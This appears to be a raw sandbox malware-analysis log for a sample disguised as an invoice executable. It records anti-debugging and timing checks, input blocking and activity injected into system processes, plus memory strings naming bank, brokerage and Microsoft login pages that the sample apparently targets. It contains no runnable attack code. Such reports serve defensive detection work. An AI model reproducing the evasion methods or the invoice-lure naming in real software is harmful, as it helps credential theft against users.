Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary, 0_2_0040E500
Source: 59F79305l7.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 59F79305l7.5.dr Binary or memory string: discord.comVMware20,11696428655f
Source: 59F79305l7.5.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 59F79305l7.5.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 59F79305l7.5.dr Binary or memory string: global block list test formVMware20,11696428655
Source: 59F79305l7.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 59F79305l7.5.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 59F79305l7.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 59F79305l7.5.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 59F79305l7.5.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: 59F79305l7.5.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 59F79305l7.5.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 59F79305l7.5.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 59F79305l7.5.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 59F79305l7.5.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: replace.exe, 00000005.00000002.3291550327.0000000002580000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2823180801.000001A539ABC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 59F79305l7.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 59F79305l7.5.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 59F79305l7.5.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 59F79305l7.5.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 59F79305l7.5.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: 59F79305l7.5.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 59F79305l7.5.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 59F79305l7.5.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 59F79305l7.5.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 59F79305l7.5.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 59F79305l7.5.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 59F79305l7.5.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 59F79305l7.5.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 59F79305l7.5.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 59F79305l7.5.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 59F79305l7.5.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: MUjPkRkjOWKkX.exe, 00000007.00000002.3292212548.000000000106F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~~
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\replace.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0387096E rdtsc 2_2_0387096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417473 LdrLoadDll, 2_2_00417473
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0045A370 BlockInput, 0_2_0045A370
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D590
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress, 0_2_0040EBD0
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_040A7110 mov eax, dword ptr fs:[00000030h] 0_2_040A7110
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_040A7170 mov eax, dword ptr fs:[00000030h] 0_2_040A7170
Source: C:\Users\user\Desktop\Revised Invoice H000127896.exe Code function: 0_2_040A5AE0 mov eax, dword ptr fs:[00000030h] 0_2_040A5AE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h] 2_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h] 2_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h] 2_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385438F mov eax, dword ptr fs:[00000030h] 2_2_0385438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0385438F mov eax, dword ptr fs:[00000030h] 2_2_0385438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03828397 mov eax, dword ptr fs:[00000030h] 2_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03828397 mov eax, dword ptr fs:[00000030h] 2_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03828397 mov eax, dword ptr fs:[00000030h] 2_2_03828397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038EC3CD mov eax, dword ptr fs:[00000030h] 2_2_038EC3CD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0383A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h] 2_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h] 2_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h] 2_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h] 2_2_038383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B63C0 mov eax, dword ptr fs:[00000030h] 2_2_038B63C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h] 2_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h] 2_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h] 2_2_038DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h] 2_2_038D43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h] 2_2_038D43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h] 2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h] 2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h] 2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h] 2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h] 2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h] 2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h] 2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h] 2_2_038403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038663FF mov eax, dword ptr fs:[00000030h] 2_2_038663FF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h] 2_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h] 2_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h] 2_2_0386A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0382C310 mov ecx, dword ptr fs:[00000030h] 2_2_0382C310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03850310 mov ecx, dword ptr fs:[00000030h] 2_2_03850310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03908324 mov eax, dword ptr fs:[00000030h] 2_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03908324 mov ecx, dword ptr fs:[00000030h] 2_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03908324 mov eax, dword ptr fs:[00000030h] 2_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03908324 mov eax, dword ptr fs:[00000030h] 2_2_03908324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h] 2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h] 2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h] 2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h] 2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h] 2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h] 2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h] 2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h] 2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h] 2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h] 2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h] 2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h] 2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h] 2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h] 2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h] 2_2_038B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h] 2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h] 2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h] 2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B035C mov ecx, dword ptr fs:[00000030h] 2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h] 2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B035C mov eax, dword ptr fs:[00000030h] 2_2_038B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038FA352 mov eax, dword ptr fs:[00000030h] 2_2_038FA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038D8350 mov ecx, dword ptr fs:[00000030h] 2_2_038D8350
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0390634F mov eax, dword ptr fs:[00000030h] 2_2_0390634F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038D437C mov eax, dword ptr fs:[00000030h] 2_2_038D437C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h] 2_2_0386E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h] 2_2_0386E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h] 2_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h] 2_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h] 2_2_038B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038402A0 mov eax, dword ptr fs:[00000030h] 2_2_038402A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038402A0 mov eax, dword ptr fs:[00000030h] 2_2_038402A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h] 2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038C62A0 mov ecx, dword ptr fs:[00000030h] 2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h] 2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h] 2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h] 2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h] 2_2_038C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0383A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039062D6 mov eax, dword ptr fs:[00000030h] 2_2_039062D6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h] 2_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h] 2_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h] 2_2_038402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0382823B mov eax, dword ptr fs:[00000030h] 2_2_0382823B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B8243 mov eax, dword ptr fs:[00000030h] 2_2_038B8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B8243 mov ecx, dword ptr fs:[00000030h] 2_2_038B8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0390625D mov eax, dword ptr fs:[00000030h] 2_2_0390625D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0382A250 mov eax, dword ptr fs:[00000030h] 2_2_0382A250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03836259 mov eax, dword ptr fs:[00000030h] 2_2_03836259
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038EA250 mov eax, dword ptr fs:[00000030h] 2_2_038EA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038EA250 mov eax, dword ptr fs:[00000030h] 2_2_038EA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03834260 mov eax, dword ptr fs:[00000030h] 2_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03834260 mov eax, dword ptr fs:[00000030h] 2_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03834260 mov eax, dword ptr fs:[00000030h] 2_2_03834260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0382826B mov eax, dword ptr fs:[00000030h] 2_2_0382826B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h] 2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h] 2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h] 2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h] 2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h] 2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h] 2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h] 2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h] 2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h] 2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h] 2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h] 2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h] 2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03870185 mov eax, dword ptr fs:[00000030h] 2_2_03870185
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h] 2_2_038EC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h] 2_2_038EC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h] 2_2_038D4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h] 2_2_038D4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h] 2_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h] 2_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h] 2_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B019F mov eax, dword ptr fs:[00000030h] 2_2_038B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h] 2_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h] 2_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h] 2_2_0382A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h] 2_2_038F61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h] 2_2_038F61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038AE1D0 mov ecx, dword ptr fs:[00000030h] 2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_038AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039061E5 mov eax, dword ptr fs:[00000030h] 2_2_039061E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038601F8 mov eax, dword ptr fs:[00000030h] 2_2_038601F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h] 2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h] 2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h] 2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h] 2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h] 2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h] 2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h] 2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h] 2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h] 2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h] 2_2_038DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038DA118 mov ecx, dword ptr fs:[00000030h] 2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h] 2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h] 2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h] 2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038F0115 mov eax, dword ptr fs:[00000030h] 2_2_038F0115
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03860124 mov eax, dword ptr fs:[00000030h] 2_2_03860124
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h] 2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h] 2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038C4144 mov ecx, dword ptr fs:[00000030h] 2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h] 2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h] 2_2_038C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0382C156 mov eax, dword ptr fs:[00000030h] 2_2_0382C156
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038C8158 mov eax, dword ptr fs:[00000030h] 2_2_038C8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03836154 mov eax, dword ptr fs:[00000030h] 2_2_03836154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03836154 mov eax, dword ptr fs:[00000030h] 2_2_03836154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03904164 mov eax, dword ptr fs:[00000030h] 2_2_03904164
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03904164 mov eax, dword ptr fs:[00000030h] 2_2_03904164
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0383208A mov eax, dword ptr fs:[00000030h] 2_2_0383208A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038280A0 mov eax, dword ptr fs:[00000030h] 2_2_038280A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038C80A8 mov eax, dword ptr fs:[00000030h] 2_2_038C80A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038F60B8 mov eax, dword ptr fs:[00000030h] 2_2_038F60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038F60B8 mov ecx, dword ptr fs:[00000030h] 2_2_038F60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B20DE mov eax, dword ptr fs:[00000030h] 2_2_038B20DE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0382A0E3 mov ecx, dword ptr fs:[00000030h] 2_2_0382A0E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038380E9 mov eax, dword ptr fs:[00000030h] 2_2_038380E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B60E0 mov eax, dword ptr fs:[00000030h] 2_2_038B60E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0382C0F0 mov eax, dword ptr fs:[00000030h] 2_2_0382C0F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038720F0 mov ecx, dword ptr fs:[00000030h] 2_2_038720F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038B4000 mov ecx, dword ptr fs:[00000030h] 2_2_038B4000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h] 2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h] 2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h] 2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h] 2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h] 2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h] 2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h] 2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h] 2_2_038D2000
